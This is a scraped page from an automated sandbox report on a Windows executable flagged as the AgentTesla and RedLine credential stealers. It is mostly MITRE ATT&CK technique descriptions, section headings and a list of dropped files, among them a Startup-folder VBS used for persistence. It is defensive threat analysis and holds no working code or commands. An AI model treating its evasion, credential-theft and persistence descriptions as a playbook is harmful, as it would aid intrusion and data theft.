Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report F#U0130YAT TEKL#U0130F.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Charley

C:\Users\user\AppData\Local\Temp\aut2DED.tmp

C:\Users\user\AppData\Local\Temp\aut2E3D.tmp

C:\Users\user\AppData\Local\Temp\aut5C12.tmp

C:\Users\user\AppData\Local\Temp\aut5C51.tmp

C:\Users\user\AppData\Local\Temp\autBC22.tmp

C:\Users\user\AppData\Local\Temp\autBC81.tmp

C:\Users\user\AppData\Local\Temp\vitraillist

C:\Users\user\AppData\Local\directory\name.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Windows Analysis Report
F#U0130YAT TEKL#U0130F.exe

Function 009842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 009842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 009C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00982CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 009C065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0098344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00982B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00983170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre